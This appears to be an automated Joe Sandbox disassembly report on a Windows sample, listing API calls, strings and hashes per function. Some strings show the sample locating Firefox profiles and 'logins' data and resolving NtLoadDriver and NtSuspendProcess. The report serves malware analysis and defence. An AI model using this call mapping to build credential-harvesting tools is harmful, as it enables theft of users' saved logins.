                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                                                              • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                                                              • API String ID: 2454223109-1580313836
                                                                                                                                                                                                                              • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                                              • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                                                                              • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                                                              • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                                                                                              • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                                                              • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                                                                • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                                                                • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                                                              • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                                                              • API String ID: 4054529287-3175352466
                                                                                                                                                                                                                              • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                                              • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                              • API String ID: 3143752011-1996832678
                                                                                                                                                                                                                              • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                                                              • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                              • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                                                              • API String ID: 667068680-2887671607
                                                                                                                                                                                                                              • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                                              • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                              • API String ID: 1607361635-601624466
                                                                                                                                                                                                                              • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                                              • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                              • API String ID: 2000436516-3842416460
                                                                                                                                                                                                                              • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                                              • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                                • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                                • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                                • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                                                              • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                                                              • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                                                              • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                                                              • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                                                              • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                                                              • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                                                              • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                                                              • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                                                              • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1043902810-0
                                                                                                                                                                                                                              • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                                              • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                                                              • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                                                              • API String ID: 2899246560-1542517562
                                                                                                                                                                                                                              • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                                                              • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                                • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                                                                                                                                • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                                                • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                                                              • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                                                                                                                                              • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                                                              • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                                                              • API String ID: 3330709923-517860148
                                                                                                                                                                                                                              • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                                                              • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                                • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                                                              • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                                                                • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                                                                • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                                                              • String ID: logins$null
                                                                                                                                                                                                                              • API String ID: 2148543256-2163367763
                                                                                                                                                                                                                              • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                                                              • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                                                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00408606
                                                                                                                                                                                                                              • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                                                              • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                              • String ID: ---
                                                                                                                                                                                                                              • API String ID: 3437578500-2854292027
                                                                                                                                                                                                                              • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                                                                                              • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                              • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                              • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                              • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1010922700-0
                                                                                                                                                                                                                              • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                                                              • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
